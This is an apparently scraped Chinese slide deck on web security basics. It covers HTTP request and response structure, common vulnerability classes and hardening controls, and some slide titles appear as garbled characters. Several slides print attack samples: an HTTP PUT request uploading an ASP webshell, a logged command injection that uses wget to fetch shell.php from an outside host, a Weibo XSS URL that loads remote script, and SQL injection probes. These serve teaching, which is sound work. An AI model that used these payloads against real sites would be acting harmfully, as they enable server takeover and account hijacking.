狠狠撸

Why----- Search, Dig , and Hack !梁伟Python[AT]Live.itCopyLeft

1234Why WEB?HTTPHackingHardeningContent

Why WEB ?WEB奋起瘦客户端浏览器能做什么？还有什么浏览器不能做？没有浏览器的电脑？Internet的新泡沫时代

Why WEB ?为什么 WEB 是非多威胁的可叠加特性Internet 爆炸二把刀程序员个人站点：臭美 > 可用 > 安全

Why WEB ?令人绝望的 WEB 2.0善用？滥用？

Why WEB ?WEB安全大事记1998 Phrack 54 NT Web Technology Vulnerabilities[SQL Injection]2001OWASP StartedNikto 1.0 released2004OWASP TOP 10 released1999 XSS was recognisedwhisker 1.0 released[ next-generation CGI scanner ]2003SQL Slammer OWASP Testing guideWebInspect 3.02005Samy WormAcunetix scanner released

Why WEB ?WEB安全的一点数据Source : IBM X-Force? 2010 Trend and Risk Report

HTTP版本与历史HTTP/0.9HTTP/1.0HTTP/1.1Year : 1990-1991简单但不大方Year : 1996RFC 1945过渡版本持续完善至今仍被兼容Year : 1997RFC 2068目前最完善版本持续改进与发展Source: RFC 2616

结构 (HTTP Request)GET / HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/QVOD, application/QVOD, */*Accept-Language: zh-cnUA-CPU: x86Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)Host: www.google.comConnection: Keep-AliveCookie: PREF=ID=ab655c79fc00eca5:U=1da01670686c1b4a:FF=0:LD=en:NW=1:CR=2:TM=1258614972:LM=1310117743:GM=1:S=3dm6LuBXWmGJn68p; NID=48=FYQN5JhSwChd_pgXNBw9-u6xMkefYb23gg6b24tApMve2lVAdBzX6xVSgeXFhdQM9DtKnHda7Kh_v6WAG_y0QtOukKDuBXOrH7psDHjV31NnI9-Pu8sNcLOHVjGWGhJc; rememberme=false

HTTP结构 (HTTP Request)HTTP Request数据结构概述METHOD /PATH HTTP/VERISIONHEADER1: ContentHEADER2: ContentHEADER3: ContentHEADER4: ContentPOST DATAs

HTTP结构 (HTTP Request)HTTP Request数据结构概述我要干什么GET / HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/QVOD, application/QVOD, */*Accept-Language: zh-cnUA-CPU: x86Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)Host: www.google.comConnection: Keep-AliveCookie: PREF=ID=ab655c79fc00eca5:U=1da01670686c1b4a:FF=0:LD=en:NW=1:CR=2:TM=1258614972:LM=1310117743:GM=1:S=3dm6LuBXWmGJn68p; NID=48=FYQN5JhSwChd_pgXNBw9-u6xMkefYb23gg6b24tApMve2lVAdBzX6xVSgeXFhdQM9DtKnHda7Kh_v6WAG_y0QtOukKDuBXOrH7psDHjV31NnI9-Pu8sNcLOHVjGWGhJc; rememberme=false我能识别什么我说什么话我用什么工具我要找谁对了！忘了告诉你我是谁

HTTP结构 (HTTP Request)HTTP Method常见的：GET、POST偶尔见到的：HEAD, RACE, LOCK,OPTIONS,PUT, MOVE, COPY, DELETE, CONNECT

结构 (HTTP Response)HTTP/1.1 200 OKDate: Fri, 08 Jul 2011 14:35:23 GMTExpires: -1Cache-Control: private, max-age=0Content-Type: text/html; charset=UTF-8Content-Encoding: gzipServer: gwsContent-Length: 11746X-XSS-Protection: 1; mode=blockxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

HTTP Response in the realworld

HTTP结构 (HTTP Response)HTTP Response数据结构概述HTTP/VERSION Status_CodeStatus_Code_descHEADER1: ContentHEADER2: ContentHEADER3: ContentX-HEADER: ContentRESPONSE DATAsRESPONSE DATAs................

HTTP结构 (HTTP Response)HTTP Response数据结构概述成功返回数据HTTP/1.1 200 OKDate: Fri, 08 Jul 2011 14:35:23 GMTExpires: -1Cache-Control: private, max-age=0Content-Type: text/html; charset=UTF-8Content-Encoding:gzipServer: gwsContent-Length: 11746X-XSS-Protection: 1; mode=blockxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx立刻过期时间（GMT）缓存控制。Private: 访问服务器而非缓存；Max-age=0 : 0秒内使用缓存数据内容类型服务器类型扩展（预留）字段此处意为支持浏览器的XSS过滤器返回长度

HTTP结构 (HTTP Response)HTTP Response数据结构概述HTTP/1.1 200 OKDate: Fri, 08 Jul 2011 14:35:23 GMTExpires: -1Cache-Control: private, max-age=0Content-Type: text/html; charset=UTF-8Content-Encoding:gzipServer: gwsContent-Length: 11746X-XSS-Protection: 1; mode=blockxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxEntity HeaderEntity Body

HTTP结构 (HTTP Response)Status Code常见： 200 , OK 201 , Create 301 , Moved Permanently 302 , Found (temporarily) 400 , Bad Request 401 , Unauthorized 404 , Not Found 500 , Internal Server Error

HTTP典型GET vs POSTGET 方法 1、提交内容在URL中 2、RFC 2616 未限制URL长度 3、IE限制URL长度为2083个字符 4、Firefox限制URL长度65536个字符POST 方法 1、提交内容置于请求实体中 2、以修改服务端内容为设计目的（RFC2616 /9.5） 3、长度无限制

HTTP典型GET vs POSTGET/POST的安全问题 1、360泄露用户信息事件 2、代码混淆GET与POST请求

HTTP典型HEAD vs GETHEAD —— 获取Entity HeaderGET —— 获取全部response

HTTP典型HEAD vs GETGET —— 获取全部responseHEAD —— 获取Entity Header

HTTP典型HEAD vs GETHEAD 用途 1、Scanner —— 版本信息 2、下载工具 —— 文件长度预载

HTTP典型REFERER 字段用途Referer —— 告诉WEB程序：我从哪里来

HTTP典型REFERER 字段用途Referer的用途 1、防止盗链 2、CSRF防护 3、Google hacking与入侵分析

贬罢罢笔典型贬翱厂罢字段用途

贬补肠办颈苍驳7类常见漏洞示例配置错误注入漏洞跨站脚本认证错误错误信息参数错误逻辑错误

Hacking配置错误 —— indexes

Hacking配置错误 —— indexes<IfModulemod_dir.c>DirectoryIndex index.html index.cgi index.pl index.php index.xhtml index.htm</IfModule>………..………..<Directory /var/www/> Options IndexesFollowSymLinksAllowOverride None Order allow,deny allow from all</Directory>

Hacking配置错误 —— HTTP PUTPUT /test.txt HTTP/1.1Host: www.site.comContent-Length: 1220<% dim objFSO %><% dim fdata %><% dim objCountFile %><% on error resume next %><% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %><% if Trim(request("syfdpath"))<>"" then %><% fdata = request("cyfddata") %><% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>…………………………………………

Hacking配置错误 —— HTTP PUTHTTP OPTIONS方法

Hacking配置错误 —— HTTP PUTWindows 2000 + IIS 5.0 的某些必然性本地权限IIS权限

Hacking配置错误 —— HTTP PUTWindows 2000 权限特性及继承方式根目录：Everyone:F异曲同工之妙：Windows 2000 下的FrontPage

Hacking配置错误 —— backup永远不要直接在WEB目录中编辑程序哪怕你知道你在做什么，但不一定知道你的编辑器在做什么！

Hacking注入漏洞 —— SQL注入Select * from table_name where id=1Select * from table_name where id=1’Select * from table_name where id=1and 1=1Select * from table_name where id=1 and 1=2Select * from table_name where id=1 and (select ……)Injection Tools: 1、SQL Helper 2、SQLMAP (v0.9)

Hacking注入漏洞 —— JS下的SQL注入用户注册时触发JS脚本对用户名自动检查可用性

Hacking注入漏洞 —— 命令注入Apache Log:/s_tar.php?S_sid=79d18ddc9&http://site.com/s_tar.php?S_sid=79d18ddc9&&F_down=1&F_tarname=cc.tar";wget%20-q%20-O%20%20/var/www/html/shell.php%20http://xxx.net/2011php Keyword:cc.tar;（分号）wgettar 命令：tar cvf somefile.tar dir1 dir2 ….Linux多命令方式：Command1; Command2; Command3; …..Linux多命令错误机制：前一条命令错误，下一条继续执行调用：tar cfcc.tar;wget …;dir1 dir2 …

贬补肠办颈苍驳跨站脚本存储型反射型顿翱惭型

Hacking跨站脚本原理简单，利用却不简单WEB 2.0 是XSS的新温床XSS/CSRF WORM ： Samy worm & Sinaweibo worm1、跨站URL：http://weibo.com/pub/star/g/xyyyd%22%3E%3Cscript%20src=http://www.2kt.cn/images/t.js%3E%3C/script%3E?type=update2、由JS发起CSRF： a、发微博 b、加关注 c、发私信About Samy Worm:http://en.wikipedia.org/wiki/Samy_(XSS)http://namb.la/popular/

Hacking认证错误 —— 无认证页面

Hacking认证错误 —— 原始信息的校验方式1、不校验 —— 直接构造恶意数据修改密码2、校验COOKIE —— CSRF

Hacking错误信息 —— “友好”的返回信息

Hacking错误信息 ——HTTP Fuzzing对错误信息的利用

Hacking参数错误 —— 权限的鉴别http://site/d477340ffa28755c?OpenDocumenthttp://site/d477340ffa28755c?EditDocumentOpenDocumentEditDocument

Hacking参数错误 —— 权限的鉴别http://site/download.asp?file=/path/down_file.rar

Hacking逻辑错误一个密码找回的逻辑错误1、密码找回页面通过调用不同UID，显示不同用户的密码找回页但此时不能修改密码uid呈现一定规律通过 HTTP FUZZING 获得

Hacking逻辑错误一个密码找回的逻辑错误2、FUZZING 获得用户信箱，恶意发起密码找回请求。

贬补肠办颈苍驳逻辑错误一个密码找回的逻辑错误3、回到密码找回页面，重新设置密码

Hardening权限原则监控 + 分析14个控制项

贬补谤诲别苍颈苍驳权限原则可写的不可执行可执行的不可写

Hardening监控 + 分析定期备份完整性校验integritAFICK (Another File Integrity Checker)日志分析LogParserRef : http://www.room702.cn/tools/LogParser.txt

贬补谤诲别苍颈苍驳14个控制项9、禁止使用闯补惫补厂肠谤颈辫迟进行任何校验10、使用安全、统一的编码或转义方式11、设定有安全的权限边界12、校验被调用的后台命令13、校验被调用的文本或配置文件14、确保程序所记录的日志可控1、独立、完整且集中的输入验证2、校验全部的程序输入3、校验全部的输入长度4、校验全部的输入类型5、不使用任何方式处理失败的数据6、对贬罢罢笔所有内容进行校验7、校验向用户输出的数据8、使用安全的厂蚕尝查询方式

Thanks !!! Q & A ???

狠狠撸

WEB 安全基础

Recommended

More Related Content

What's hot (12)

Similar to WEB 安全基础 (20)

WEB 安全基础